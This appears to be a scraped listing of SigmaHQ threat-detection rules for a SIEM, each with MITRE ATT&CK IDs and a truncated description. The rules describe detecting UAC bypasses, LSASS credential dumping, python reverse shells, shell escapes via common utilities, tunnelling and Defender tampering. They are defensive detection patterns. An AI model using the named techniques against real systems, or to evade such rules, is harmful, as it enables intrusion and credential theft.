Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This beh

SigmaHQ source
T1219.002
imProcessCreate

Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.

SigmaHQ source
T1070.004, T1027.005, T1485, T1553.002
imRegistry

Detects files that have extensions commonly seen while SDelete is used to wipe files.

SigmaHQ source
T1087.001
imProcessCreate

Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

backdoor
SigmaHQ source
T1685, T1112
imRegistry

Detects a NetNTLM downgrade attack

SigmaHQ source
T1548.002
imProcessCreate

Detects the Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privileges

SigmaHQ source
T1548.002, T1218.003
imProcessCreate

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

evasion
SigmaHQ source
T1083
imProcessCreate

Detects usage of system utilities such as "find", "tree", "findmnt", etc., to discover files, directories and network shares.

SigmaHQ source
T1112
imProcessCreate

Detects usage of reg.exe or PowerShell by non-privileged users to modify service configuration in the registry

backdoor, powershell
SigmaHQ source
T1574.011
imProcessCreate

Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service's ImagePath or FailureCommand

SigmaHQ source
T1574.011
imProcessCreate

Detects modification of service configuration (ImagePath, FailureCommand and ServiceDLL) in the registry by processes with Medium integrity level

backdoor
SigmaHQ source
T1548.002
imProcessCreate

A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used in UAC bypass techniques.

evasion
SigmaHQ source
T1574.005
imProcessCreate

Detects the execution of "Setup16.EXE", an old installation utility, with a custom ".lst" file. These ".lst" files can contain references to external programs that "Setup16.EXE" will execute. Attackers a

SigmaHQ source
T1134.002
imProcessCreate

Detects child processes spawned with SYSTEM privileges by parents running as the LOCAL SERVICE or NETWORK SERVICE accounts

SigmaHQ source
T1202
imProcessCreate

ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administ

backdoor
SigmaHQ source
T1218.011
imProcessCreate

Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass e

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the "IDiagnosticProfileUAC" UAC bypass technique

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

evasion
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

evasion
UAC Bypass WSReset
sigma high
SigmaHQ source
T1548.002
imProcessCreate

Detects the pattern of UAC Bypass via WSReset, usable with the default sysmon-config

evasion
SigmaHQ source
T1505.003, T1190
imProcessCreate

Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation

exploit, webshell
SigmaHQ source
T1055
imProcessCreate

Detects the use of CoercedPotato, a tool for privilege escalation

SigmaHQ source
T1003.001
imProcessCreate

Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine

credential-theft
SigmaHQ source
T1588.002, T1003
imProcessCreate

Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed

SigmaHQ source
imProcessCreate

Detects the execution of the GMER tool based on image and hash fields.

SigmaHQ source
T1003.001
imProcessCreate

Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same

backdoor, credential-theft
SigmaHQ source
T1134.001, T1134.003
imProcessCreate

Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively

lateral-movement, wmi
SigmaHQ source
imProcessCreate

Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples

SigmaHQ source
T1068
imProcessCreate

Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120

exploit
MpiExec Lolbin
sigma high
SigmaHQ source
T1218
imProcessCreate

Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary

SigmaHQ source
T1090
imProcessCreate

Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.

SigmaHQ source
T1090
imProcessCreate

Detects the use of IOX - a tool for port forwarding and intranet proxy purposes

SigmaHQ source
T1105
imProcessCreate

Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

SigmaHQ source
T1090
imProcessCreate

Detects the use of NPS, a port forwarding and intranet penetration proxy server

backdoor
SigmaHQ source
T1218
imProcessCreate

Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks

SigmaHQ source
imProcessCreate

Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.

SigmaHQ source
T1059
imProcessCreate

Detects a python process calling the PTY module in order to spawn a pseudo-terminal, which could be indicative of potential reverse shell activity.

SigmaHQ source
T1059.001
imRegistry

Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and

apt
SigmaHQ source
imFileEvent

Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.

SigmaHQ source
T1102, T1102.001
imNetworkSession

Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous at

SigmaHQ source
T1003.001
imFileEvent

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

SigmaHQ source
T1685
imRegistry

Detects when attackers or tools disable Windows Defender functionalities via the Windows registry

SigmaHQ source
T1219.002
imProcessCreate

Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by l

SigmaHQ source
T1587
imProcessCreate

Detects known hacktool execution based on image name.

SigmaHQ source
T1046
imProcessCreate

Detects execution of network scanning and reconnaissance tools. These tools can be used, for example, for the enumeration of local or remote network services.

SigmaHQ source
T1567, T1572
imNetworkSession

Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
T1059
imProcessCreate

Detects the use of the "capsh" utility to invoke a shell.

SigmaHQ source
T1059
imProcessCreate

Detects execution of inline Python code via the "-c" flag in order to call the "system" function from the "os" library and spawn a shell.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1059
imProcessCreate

Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1083
imProcessCreate

Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro

SigmaHQ source
T1059
imProcessCreate

Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.

SigmaHQ source
T1059
imProcessCreate

Detects the execution of "awk" or its sibling commands to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate pri

SigmaHQ source
T1083
imProcessCreate

Detects the use of "vim" and its sibling commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro

SigmaHQ source
T1059
imProcessCreate

Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

SigmaHQ source
T1055, T1036
imProcessCreate

Detects suspicious Windows Error Reporting manager (wermgr.exe) child process

SigmaHQ source
T1216
imProcessCreate

Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living-off-the-land binary in order to proxy execution.

SigmaHQ source
T1135
imProcessCreate

Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.

SigmaHQ source
T1210
imProcessCreate

Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequen

lateral-movement
SigmaHQ source
T1564.002
imProcessCreate

Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed

SigmaHQ source
T1685
imRegistry

Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious

SigmaHQ source
T1112
imRegistry

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote

credential-theft
SigmaHQ source
T1036, T1218
imProcessCreate

Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)

exploit
SigmaHQ source
imRegistry

Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.

SigmaHQ source
T1685
imRegistry

Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".

SigmaHQ source
T1218.011
imProcessCreate

Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One tr

SigmaHQ source
T1218
imProcessCreate

Detects the execution of the Xwizard tool with the "RunWizard" flag and a GUID-like argument. This utility can be abused in order to run a custom COM object registered in the registry.

SigmaHQ source
imProcessCreate

Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in

evasion
SigmaHQ source
T1112
imRegistry

Detects potential persistence activity via the Outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.

persistence
SigmaHQ source
T1112
imRegistry

Detects potential persistence activity via the Outlook Today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".

persistence
SigmaHQ source
T1003
imFileEvent

Detects file access requests to cryptocurrency wallet files by uncommon processes. This could indicate a potential attempt to steal cryptocurrency wallets.

SigmaHQ source
T1552.006
imFileEvent

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

SigmaHQ source
T1555.004
imFileEvent

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" fun

SigmaHQ source
T1555.004
imFileEvent

Detects file access requests to the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::m

SigmaHQ source
T1003
imFileEvent

Detects suspicious processes, based on name and location, that access the Windows credential manager and vault, which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi

SigmaHQ source
imProcessCreate

Detects the use of processes with no name (".exe"), which can be used to evade Image-based detections.

SigmaHQ source
T1528
imFileEvent

Detects file access attempts to sensitive Microsoft Teams files (leveldb, cookies) by an uncommon process.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "DbgModel.dll"

SigmaHQ source
T1219.002
imFileEvent

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target

SigmaHQ source
T1218
imNetworkSession

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually i

SigmaHQ source
T1102, T1102.001
imNetworkSession

Detects a network connection initiated by a non-browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.

backdoor
SigmaHQ source
T1564, T1059
imProcessCreate

Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.

SigmaHQ source
T1036
imProcessCreate

Detects a potentially suspicious execution from an uncommon folder.

SigmaHQ source
imProcessCreate

Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execu

SigmaHQ source
T1218
imProcessCreate

Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard

infostealer
SigmaHQ source
T1556
imRegistry

Detects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a

backdoorpersistence
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "MpSvc.dll".

SigmaHQ source
imFileEvent

Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensit

SigmaHQ source
T1685
imRegistry

Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.

SigmaHQ source
T1562.001
imRegistry

Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker t

SigmaHQ source
T1113
imRegistry

Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, the OS will back up the System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows create

SigmaHQ source
T1003.001
imFileEvent

Detects file creation events with filename patterns used by CrackMapExec.

SigmaHQ source
T1219.002
imFileEvent

Detects the presence and execution of Inveigh via dropped artefacts

SigmaHQ source
T1558
imFileEvent

Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.

SigmaHQ source
imFileEvent

Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file

SigmaHQ source
T1003
imFileEvent

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

SigmaHQ source
T1574.001
imFileEvent

PowerUp's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies o

SigmaHQ source
T1003.002
imFileEvent

Detects a dump file written by QuarksPwDump password dumper

SigmaHQ source
T1219.002
imFileEvent

Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.

SigmaHQ source
T1003.001
imFileEvent

Detects default lsass dump filename generated by SafetyKatz.

SigmaHQ source
T1552.001
imFileEvent

Detects files written by the different tools that exploit HiveNightmare

SigmaHQ source
T1218
imProcessCreate

Detects an uncommon parent process of "LINK.EXE". Link.EXE is the Microsoft incremental linker. It's a utility usually bundled with the Visual Studio installation. Multiple utilities often found in the same fo

SigmaHQ source
T1555, T1552.004
imFileEvent

Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.

SigmaHQ source
T1059.001
imProcessCreate

Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DI

powershell
SigmaHQ source
T1218T1202
imProcessCreate

Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any ar

SigmaHQ source
T1036.005
imFileEvent

Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unexpected locations (outside of "System32", "SysWOW64", etc.). It is highly recommended to

SigmaHQ source
T1572, T1090, T1102
imNetworkSession

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have

evasion
SigmaHQ source
T1572, T1090, T1102
imNetworkSession

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have

SigmaHQ source
T1090, T1572
imProcessCreate

Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersk

SigmaHQ source
T1113
imRegistry

Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Wind

exploit
SigmaHQ source
T1113
imRegistry

Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recal

exploit
SigmaHQ source
T1105
imNetworkSession

Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.

SigmaHQ source
T1041, T1090.002
imNetworkSession

Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors

backdoor
SigmaHQ source
T1203
imNetworkSession

Detects network connections from the Equation Editor process "eqnedt32.exe".

SigmaHQ source
T1567.002
imNetworkSession

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.

SigmaHQ source
T1218.003
imNetworkSession

Detects a network connection initiated by Cmstp.EXE. It is uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.

SigmaHQ source
T1105
imNetworkSession

Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.

SigmaHQ source
T1567, T1572
imNetworkSession

Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
imFileEvent

Detects the creation of files with scripting or executable extensions by the MySQL daemon, which could be an indicator of "User Defined Functions" abuse to download malware.

SigmaHQ source
imProcessCreate

Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.

evasion
SigmaHQ source
T1571
imNetworkSession

Detects programs that connect to known malware callback ports based on threat intelligence reports.

UAC Disabled
sigma medium
SigmaHQ source
T1548.002
imRegistry

Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.

SigmaHQ source
T1548.002
imRegistry

Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthoriz

backdoor
SigmaHQ source
T1548.002
imRegistry

Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whe

backdoor
SigmaHQ source
imProcessCreate

Detects suspicious execution of "PDQDeployRunner", which is part of the PDQDeploy service stack that is responsible for executing commands and packages on remote machines.

SigmaHQ source
T1071.001
imNetworkSession

Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Win

backdoor, infostealer
SigmaHQ source
T1046
imProcessCreate

Detects usage of SoftPerfect's "netscan.exe", an application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.

SigmaHQ source
T1218.009
imNetworkSession

Detects "RegAsm.exe" initiating a network connection to public IP addresses.

SigmaHQ source
T1218, T1027.004
imProcessCreate

Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.

evasion
SigmaHQ source
T1218
imProcessCreate

Detects uncommon child processes of the "DefaultPack.EXE" binary used as a proxy to launch other programs.

SigmaHQ source
T1046
imProcessCreate

Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker

SigmaHQ source
T1027, T1059.001
imProcessCreate

Detects obfuscated use of stdin to execute PowerShell.

evasion, powershell
SigmaHQ source
T1027, T1059.001
imProcessCreate

Detects obfuscated use of environment variables to execute PowerShell.

evasion, powershell
Malware User Agent
sigma high
SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used by malware in proxy logs

ServiceDll Hijack
sigma medium
SigmaHQ source
T1543.003
imRegistry

Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

persistence
SigmaHQ source
T1564.001
imRegistry

Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families

SigmaHQ source
T1562.002
imFileEvent

Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or si

SigmaHQ source
T1547.003
imRegistry

Detects processes setting a new DLL in DllName under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system

SigmaHQ source
imRegistry

Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Sear

persistence
SigmaHQ source
T1547.010
imRegistry

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to

persistence
SigmaHQ source
T1685.001
imRegistry

Detects tampering with the "ChannelAccess" registry key in order to change access to a Windows event channel.

SigmaHQ source
T1547.010
imRegistry

Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interf

backdoor
SigmaHQ source
T1070.005
imRegistry

Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

backdoor, persistence
SigmaHQ source
T1686.003
imRegistry

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

evasion
SigmaHQ source
T1685.001
imRegistry

Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel

SigmaHQ source
T1090
imRegistry

Detects the modification of the PortProxy registry key which is used for port forwarding.

SigmaHQ source
T1021.002, T1543.003, T1569.002
imRegistry

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.

cobalt-strike, lateral-movement
SigmaHQ source
T1112
imRegistry

Rule to detect the configuration of the Run Once registry key. The configured payload can be run by runonce.exe /AlternateShellStartup

backdoor, persistence
SigmaHQ source
T1685
imRegistry

Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

SigmaHQ source
T1685
imRegistry

Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry

SigmaHQ source
T1016
imNetworkSession

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.

SigmaHQ source
T1070.005
imRegistry

Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) con

backdoor, ransomware
SigmaHQ source
T1112
imRegistry

Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.

SigmaHQ source
T1053.005
imProcessCreate

Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands

SigmaHQ source
T1558, T1550.003
imNetworkSession

Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.

lateral-movement
SigmaHQ source
T1574.011
imProcessCreate

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally speci

backdoor
SigmaHQ source
T1105
imNetworkSession

Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use scripts to download malicious payloads.

SigmaHQ source
T1588.002
imProcessCreate

Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools

SigmaHQ source
T1218.010
imProcessCreate

Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.

Replace.exe Usage
sigma medium
SigmaHQ source
T1105
imProcessCreate

Detects the use of Replace.exe, which can be used to replace a file with another file.

SigmaHQ source
T1685
imProcessCreate

Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare-bones one to avoid monitoring without shutting down the service completely.

backdoor
SigmaHQ source
T1685
imProcessCreate

Detects the removal of Sysmon, which could be a potential attempt at defense evasion

evasion
SigmaHQ source
T1571
imNetworkSession

Detects programs that connect to uncommon destination ports

SigmaHQ source
T1055, T1218
imNetworkSession

Detects suspicious connections from Microsoft Sync Center to non-private IPs.

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process

SigmaHQ source
T1218.011
imNetworkSession

Detects a "winlogon.exe" process that initiates network communications with public IP addresses.

SigmaHQ source
T1571
imNetworkSession

Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases

SigmaHQ source
T1572, T1021.001
imNetworkSession

Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389

SigmaHQ source
T1078, T1190, T1133
imAuthentication

Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

SigmaHQ source
T1133
imProcessCreate

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom

SigmaHQ source
T1133
imProcessCreate

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom

SigmaHQ source
imRegistry

Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.

SigmaHQ source
T1614.001
imProcessCreate

Detects use of chcp to look up the system locale value as part of host discovery

SigmaHQ source
T1218, T1105
imProcessCreate

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

SigmaHQ source
T1572, T1021.001, T1021.004
imProcessCreate

Detects port forwarding activity via SSH.exe

SigmaHQ source
T1587.001
imProcessCreate

Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges

lateral-movement
SigmaHQ source
T1587.001
imProcessCreate

Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights

lateral-movement
SigmaHQ source
T1070.004
imProcessCreate

Detects a method often used by ransomware, which combines "ping" to wait a couple of seconds and then "del" to delete the file in question. It's used to hide the file responsible for the initial in

ransomware
SigmaHQ source
T1219.002
imProcessCreate

Detects potentially suspicious child processes launched via the ScreenConnect client service.

SigmaHQ source
T1133
imProcessCreate

Detects ScreenConnect program starts that establish remote access to a system.

SigmaHQ source
T1190
imProcessCreate

Detects potential web shell execution from the ScreenConnect server process.

webshell
SigmaHQ source
imProcessCreate

Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)

SigmaHQ source
T1219.002
imProcessCreate

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target

SigmaHQ source
T1098
imProcessCreate

Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".

SigmaHQ source
imProcessCreate

Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline

APT User Agent
sigma high
SigmaHQ source
T1071.001
imWebSession

Detects suspicious user agent strings used in APT malware in proxy logs

SigmaHQ source
T1071.001
imWebSession

Detects Baby Shark C2 Framework default communication patterns

SigmaHQ source
T1590
imWebSession

Detects the update check performed by Advanced IP/Port Scanner utilities.

SigmaHQ source
T1021.001
imNetworkSession

Detects non-standard tools initiating a connection over port 3389, indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling tha

lateral-movement
SigmaHQ source
T1036
imProcessCreate

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Fi

SigmaHQ source
imProcessCreate

Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rul

evasion
SigmaHQ source
T1218
imFileEvent

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Att

SigmaHQ source
T1567, T1568.002, T1572, T1090, T1102
imNetworkSession

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communicatio

backdoor
SigmaHQ source
T1055
imNetworkSession

Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network co

cobalt-strike
SigmaHQ source
T1548.002
imRegistry

